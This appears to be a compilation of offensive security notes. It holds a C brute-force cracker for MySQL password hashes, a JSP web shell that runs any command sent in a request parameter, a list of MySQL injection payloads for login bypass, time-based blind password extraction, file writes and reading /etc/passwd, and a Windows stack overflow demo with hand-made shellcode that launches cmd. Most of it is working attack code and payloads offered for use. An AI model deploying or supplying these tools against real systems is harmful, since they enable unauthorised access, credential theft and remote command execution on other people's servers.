/*
* This is a high-speed brute-force password cracker for MySQL hashed
* passwords. It can break an 8-character password containing any
* printable ascii characters in a matter of hours on an ordinary PC.
*
* This program is public domain. Share and enjoy.
*
* Example:
* $ gcc -O2 -fomit-frame-pointer mysqlfast.c -o mysqlfast
* $ mysqlfast 6294b50f67eda209
* Hash: 6294b50f67eda209
* Trying length 3
* Trying length 4
* Found pass: barf
*
* The MySQL password hash function could be strengthened considerably
* by:
* - making two passes over the password
* - using a bitwise rotate instead of a left shift
* - causing more arithmetic overflows
*/
#include <stdio.h>
/* 32-bit word used for the hash state and the target halves */
typedef unsigned long u32;
/* Allowable characters in password; 33-126 is printable ascii */
#define MIN_CHAR 33
#define MAX_CHAR 126
/* Maximum length of password */
#define MAX_LEN 12
/* Keeps the low 31 bits of the intermediate differences computed in crack0() */
#define MASK 0x7fffffffL
/*
 * Search for a password of length stop+4 whose hash matches (targ1, targ2).
 *
 * Positions 0..stop are enumerated exhaustively over MIN_CHAR..MAX_CHAR,
 * carrying the hash state forward one character at a time in the
 * state1_ary/state2_ary snapshots.  For each candidate character c at
 * position stop+1 the remaining two characters d and e are obtained from
 * the divisibility tests in the inner loop rather than enumerated.
 *
 * @param stop      index of the last exhaustively enumerated position;
 *                  the caller passes len-4 (so -1 for a 3-character password)
 * @param targ1     first half of the target hash
 * @param targ2     second half of the target hash, already folded by crack()
 * @param pass_ary  out: receives the recovered characters in pass_ary[0..stop+3]
 * @return 1 with pass_ary filled on success, 0 when the search space is exhausted
 */
int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary)
{
    int i, c;
    u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2;
    u32 newstate1, newstate2, newstate3;
    /* hash state after positions 0..i, one snapshot per prefix length */
    u32 state1_ary[MAX_LEN-2], state2_ary[MAX_LEN-2];
    /* per-position mixing terms, updated incrementally when pass_ary[i] changes */
    u32 xor_ary[MAX_LEN-3], step_ary[MAX_LEN-3];
    i = -1;
    sum = 7;                        /* running character sum; the hash starts it at 7 */
    state1_ary[0] = 1345345333L;    /* initial hash state */
    state2_ary[0] = 0x12345671L;
    while (1) {
        /* extend the prefix with MIN_CHAR up to position stop, folding each
         * character into the state snapshot for the next position */
        while (i < stop) {
            i++;
            pass_ary[i] = MIN_CHAR;
            step_ary[i] = (state1_ary[i] & 0x3f) + sum;
            xor_ary[i] = step_ary[i]*MIN_CHAR + (state1_ary[i] << 8);
            sum += MIN_CHAR;
            state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
            state2_ary[i+1] = state2_ary[i]
                + ((state2_ary[i] << 8) ^ state1_ary[i+1]);
        }
        /* state after the enumerated prefix; now try every c at position stop+1 */
        state1 = state1_ary[i+1];
        state2 = state2_ary[i+1];
        step = (state1 & 0x3f) + sum;
        xor1 = step*MIN_CHAR + (state1 << 8);
        xor2 = (state2 << 8) ^ state1;
        /* xor1 grows by exactly step per candidate, so it is not recomputed */
        for (c = MIN_CHAR; c <= MAX_CHAR; c++, xor1 += step) {
            newstate2 = state2 + (xor1 ^ xor2);
            newstate1 = state1 ^ xor1;
            newstate3 = (targ2 - newstate2) ^ (newstate2 << 8);
            /* candidate for position stop+2 must divide the difference exactly
             * and be a printable character */
            div = (newstate1 & 0x3f) + sum + c;
            diff = ((newstate3 ^ newstate1) - (newstate1 << 8)) & MASK;
            if (diff % div != 0) continue;
            d = diff / div;
            if (d < MIN_CHAR || d > MAX_CHAR) continue;
            /* same test for the final character at position stop+3 */
            div = (newstate3 & 0x3f) + sum + c + d;
            diff = ((targ1 ^ newstate3) - (newstate3 << 8)) & MASK;
            if (diff % div != 0) continue;
            e = diff / div;
            if (e < MIN_CHAR || e > MAX_CHAR) continue;
            pass_ary[i+1] = c;
            pass_ary[i+2] = d;
            pass_ary[i+3] = e;
            return 1;
        }
        /* backtrack: drop trailing positions that have already reached MAX_CHAR */
        while (i >= 0 && pass_ary[i] >= MAX_CHAR) {
            sum -= MAX_CHAR;
            i--;
        }
        if (i < 0) break;           /* every prefix has been tried */
        /* advance position i by one character and refresh its state snapshot */
        pass_ary[i]++;
        xor_ary[i] += step_ary[i];
        sum++;
        state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
        state2_ary[i+1] = state2_ary[i]
            + ((state2_ary[i] << 8) ^ state1_ary[i+1]);
    }
    return 0;
}
/*
 * Driver for one hash string: parse the two 32-bit halves, fold the second
 * half into the form crack0() expects, then try every length from 3 up to
 * MAX_LEN until crack0() reports a match.  Progress and the result are
 * written to stdout; a hash that does not parse as two hex words is rejected.
 *
 * @param hash  NUL-terminated hex string of the target hash
 */
void crack(char *hash)
{
    u32 targ1, targ2, targ3;
    int pass[MAX_LEN];
    int len;

    if (sscanf(hash, "%8lx%lx", &targ1, &targ2) != 2) {
        printf("Invalid password hash: %s\n", hash);
        return;
    }
    printf("Hash: %08lx%08lx\n", targ1, targ2);

    /* three folding rounds of the second half against the first */
    targ3 = targ2 - targ1;
    for (int round = 0; round < 3; round++)
        targ3 = targ2 - ((targ3 << 8) ^ targ1);

    for (len = 3; len <= MAX_LEN; len++) {
        printf("Trying length %d\n", len);
        if (!crack0(len-4, targ1, targ3, pass))
            continue;
        printf("Found pass: ");
        for (int k = 0; k < len; k++)
            putchar(pass[k]);
        putchar('\n');
        break;
    }
    /* the loop only runs past MAX_LEN when no length produced a match */
    if (len > MAX_LEN)
        printf("Pass not found\n");
}
/*
 * Entry point: prints a usage line when no argument is given, then runs
 * crack() on every command-line argument in order.  Always exits 0.
 */
int main(int argc, char *argv[])
{
    if (argc <= 1)
        printf("usage: %s hash\n", argv[0]);
    for (int k = 1; k < argc; k++)
        crack(argv[k]);
    return 0;
}
JSP 버전
<%@ page import="java.io.*" %>
<%
// Runs the "cmd" request parameter as an OS process and copies the child's
// stdout into the HTTP response.  The parameter reaches Runtime.exec()
// unvalidated and nothing on the page authenticates the caller, so this is a
// remote command execution endpoint by construction -- the exec()-fed-from-a-
// request-parameter pattern that web-shell scanners flag.  The child's stderr
// is never read.
try {
    String cmd = request.getParameter("cmd");
    Process child = Runtime.getRuntime().exec(cmd);
    InputStream in = child.getInputStream();
    int c;
    // byte-at-a-time copy; each byte is widened to a char rather than decoded
    while ((c = in.read()) != -1) {
        out.print((char)c);
    }
    in.close();   // not in a finally block: the stream is leaked if read() throws
    try {
        child.waitFor();
    } catch (InterruptedException e) {
        e.printStackTrace();
    }
} catch (IOException e) {
    System.err.println(e);
}
%>
http://URL/cmd.jsp?cmd=명령어
SELECT * FROM login /* foobar */
SELECT * FROM login WHERE id = 1 or 1=1
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"
SHOW TABLES
SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES
SELECT VERSION
SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION()
SELECT host,user,db from mysql.db
SELECT * FROM login WHERE id = 1 or 1=1; select host,user,db from mysql.db;
SELECT 1 && 1;
SELECT 1 || 1;
SELECT 1 XOR 0;
all render TRUE or 1.
SELECT 0.1 <= 2;
SELECT 2 >= 2;
SELECT ISNULL(1/0);
SELECT FLOOR(7 + (RAND() * 5));
SELECT ROUND(23.298, -1);
SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
SELECT MD5('abc');
SELECT BENCHMARK(10000000,ENCODE('abc','123'));
this takes around 5 sec on a localhost
SELECT BENCHMARK(1000000,MD5(CHAR(116)))
this takes around 7 sec on a localhost
SELECT BENCHMARK(10000000,MD5(CHAR(116)))
this takes around 70 sec on a localhost
SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login
Beware of the N rounds: add an extra zero and it could stall or crash your
browser!
SELECT COUNT(*) FROM tablename
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user LIKE "%"
SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;
SELECT * FROM tablename WHERE email = 'user@site.com';
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user = 'username'
SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE
'/path/location/on/server/www/passes.txt'
SELECT password FROM tablename WHERE username =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) INTO
OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(
39))
Note: you must specify a new file (it must not already exist) and give the correct
pathname!
SELECT * FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
SELECT * FROM login WHERE user = CHAR(39,97,39)
SELECT user FROM login WHERE user = 'root'
UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login
SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login
SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5('x')),null) FROM login
is like: (password,1,2) this selects: 'ab'
is like: (password,1,3) this selects: 'abc'
is like: (password,1,4) this selects: 'abcd'
SELECT user FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login
Possible chars: 0 to 9 - ASCII 48 to 57 ~ a to z - ASCII 97 to 122
INSERT INTO login SET user = 'r00t', pass = 'abc'
load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user =
'r00t', pass = 'abc'
Then login!
SELECT host,user,password FROM user into outfile '/tmp/passwd';
UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';
(MySQL 4.1.x before 4.1.20 and 5.0.x)
WHERE x = 0xbf27admin 0xbf27
"injection string"
Additional information: the above chars are Chinese Big5
SELECT * FROM login WHERE user = 'root'
SELECT * FROM login WHERE user = 0x726F6F74
insert into login set user = 'root', pass = 'root'
insert into login set user = 0x726F6F74, pass = 0x726F6F74
SELECT HEX('root');
726F6F74
0x
소스코드
-----------------------------------------------
#include <stdio.h>
#include <windows.h>
/*
buffer[256byte] + [ebp 4byte] + [eip 4type] = 264byte
B_SIZE(264byte) = shellcode( 43byte = shellcode(42byte) + '\0'(1byte) ) + nop*217 (nop+ebp) + ret(eip='\x1c\x29\x42\x00' 4byte)
*/
/* Machine code for the inline-assembly routine developed in the shellcode
 * post further down this page: it writes "cmd" into a stack buffer and calls
 * WinExec and then ExitProcess through absolute addresses baked into the
 * bytes, so it only runs correctly on the build those addresses came from. */
char shellcode[] = "\x55\x8B\xEC\x33\xDB\x53\x56\x57\xC6\x45"
                   "\xFC\x63\xC6\x45\xFD\x6D\xC6\x45\xFE\x64"
                   "\x6A\x05\x8D\x45\xFC\x50\xB8\x6D\x13\x86"
                   "\x7C\xFF\xD0\x6A\x01\xB8\xDA\xCD\x81\x7C"
                   "\xFF\xD0";
/* payload length: 256-byte buffer + 4-byte saved ebp + 4-byte return address */
#define B_SIZE 264
char str[B_SIZE];
/*
 * Stack overflow demonstration: str holds B_SIZE (264) bytes but buffer holds
 * 256, so the memcpy into buffer runs 8 bytes past its end.  Those bytes land
 * on whatever follows buffer in main's frame -- the layout note above assumes
 * the saved ebp and then the return address -- and the hard-coded ret[] value
 * is the address str had in the author's own build, so it is unlikely to match
 * anywhere else.  The loop afterwards dumps both arrays side by side so the
 * overwrite can be inspected.  This is the bug class a bounds-checked copy
 * prevents; the copy length must never exceed sizeof(buffer).
 * NOTE(review): the %x/%d conversions are given pointers and size_t values,
 * which -Wformat flags and which is undefined behavior in ISO C.
 */
int main(int argc, char *argv[])
{
    char buffer[256];
    char ret[] = "\x1c\x29\x42\x00";
    // str address : 42291c -> \x1c\x29\x42\x00  (from the author's build)
    memset(str,'\x90',B_SIZE);                      // fill with 0x90 (nop),
    memcpy(str, shellcode, sizeof(shellcode));      // then put the shellcode at the front.
    memcpy(str+sizeof(shellcode)+217, ret, sizeof(ret));
    // 217 nops past the shellcode (running over the saved ebp) put ret[] where the saved eip sits.
    memcpy(buffer, str, sizeof(str));               // copy str over buffer: 264 bytes into 256.
    printf("------------------------------------------------------------------------\n");
    for(int i=0;i<sizeof(str);i++)
        printf("[Count %3d] bufferAddr: %x <-> %10x : %10x <-> strAddr: %x \n", i, &buffer[i], buffer[i], str[i], &str[i]);
    printf("------------------------------------------------------------------------\n");
    printf("buffer address : %8x\n", buffer);
    printf("str address : %8x\n", str);
    printf("buffer size : %d\n", sizeof(buffer));
    printf("str size : %d\n", sizeof(str));
    printf("shellcode size : %d\n", sizeof(shellcode));
    printf("------------------------------------------------------------------------\n");
    return 0;
}
실행해보면...
#include <windows.h>
/*
 * Minimal program the shellcode is derived from: builds "cmd" byte by byte in
 * a stack buffer, launches it with WinExec and exits.  The per-byte stores
 * (instead of a string literal) are presumably what makes the compiler emit
 * the individual mov byte ptr instructions shown in the disassembly that follows.
 * NOTE(review): exit() is called without including <stdlib.h>; this relies on
 * windows.h pulling in its declaration.  void main() is non-standard.
 */
void main()
{
    char buf[4];
    buf[0] = 'c';
    buf[1] = 'm';
    buf[2] = 'd';
    buf[3] = '\0';
    WinExec(buf, SW_SHOW);
    exit(1);
}
------------------------------------
exit()부근에 브포를 걸어주고 실행
00401010 push ebp
00401011 mov ebp,esp
00401013 sub esp,44h
00401016 push ebx
00401017 push esi
00401018 push edi
00401019 lea edi,[ebp-44h]
0040101C mov ecx,11h
00401021 mov eax,0CCCCCCCCh
00401026 rep stos dword ptr [edi]
5: char buf[4];
6:
7: buf[0] = 'c';
00401028 mov byte ptr [ebp-4],63h
8: buf[1] = 'm';
0040102C mov byte ptr [ebp-3],6Dh
9: buf[2] = 'd';
00401030 mov byte ptr [ebp-2],64h
10: buf[3] = '\0';
00401034 mov byte ptr [ebp-1],0
11:
12: WinExec(buf, SW_SHOW);
00401038 mov esi,esp
0040103A push 5
0040103C lea eax,[ebp-4]
0040103F push eax
00401040 call dword ptr [__imp__WinExec@8 (0042413c)]
00401046 cmp esi,esp
00401048 call __chkesp (00401250)
13:
14: exit(1);
0040104D push 1
0040104F call exit (004010c0)
------------------------------------
불필요한 부분은 제거하고
/*
 * The routine from the disassembly above re-entered as MSVC inline assembly
 * and trimmed: the stack check and the import-table indirection are gone,
 * WinExec and ExitProcess are called through absolute addresses loaded into
 * eax, and the author's two edits (xor ebx,ebx added, the explicit zero store
 * dropped) are marked by the comments.  The addresses are the 0x7C800000
 * module base plus the export offsets listed below, valid only on that build.
 */
void main()
{
    __asm {
        push ebp
        mov ebp,esp
        // added: xor
        xor ebx,ebx
        // end.
        push ebx
        push esi
        push edi
        mov byte ptr [ebp-4],63h
        mov byte ptr [ebp-3],6Dh
        mov byte ptr [ebp-2],64h
        //mov byte ptr [ebp-1],0 <-- deleted
        push 5
        lea eax,[ebp-4]
        push eax mov eax, 0x7C86136D   // NOTE(review): two instructions on one line here: push eax, then mov eax,...
        call eax
        push 1
        mov eax, 0x7C81CDDA
        call eax
    }
}
-----------------------------------
xor연산으로 \x90을 없애는 작업을 해준다.
Dependency Walker으로 call 부분을 수정해야한다.
WINEXEC
ENTRY POINT: 0x0006136D
EXITPROCESS
ENTRY POINT: 0x0001CDDA
CALL WINEXEC: 0x7C800000 + 0x0006136D = 0x7C86136D
CALL EXITPROCESS : 0x7C800000 + 0x0001CDDA = 0x7C81CDDA
------------------------------------
디버깅환경에서 code bytes를 통해 바이너리 코드를
가져와서 보기 좋게 가공.
------------------------------------
#include <windows.h>
/* Bytes extracted from the inline-assembly routine above (same bytes as in the
 * bof test post on this page); the two absolute call targets are baked in. */
char shellcode[] = "\x55\x8B\xEC\x33\xDB\x53\x56\x57\xC6\x45"
                   "\xFC\x63\xC6\x45\xFD\x6D\xC6\x45\xFE\x64"
                   "\x6A\x05\x8D\x45\xFC\x50\xB8\x6D\x13\x86"
                   "\x7C\xFF\xD0\x6A\x01\xB8\xDA\xCD\x81\x7C"
                   "\xFF\xD0";
/*
 * Test harness for the bytes above: treats the word two ints past the local
 * `ret` as main's saved return address (assumes a frame where the return
 * address sits 8 bytes above the first local -- TODO confirm for the compiler
 * in use) and points it at shellcode.  Pointer arithmetic past a local object
 * is undefined behavior in ISO C; this is compiler- and debugger-dependent
 * demo code, not portable.
 */
void main()
{
    int *ret;
    ret = (int *)&ret+2;
    (*ret) = (int)shellcode;
}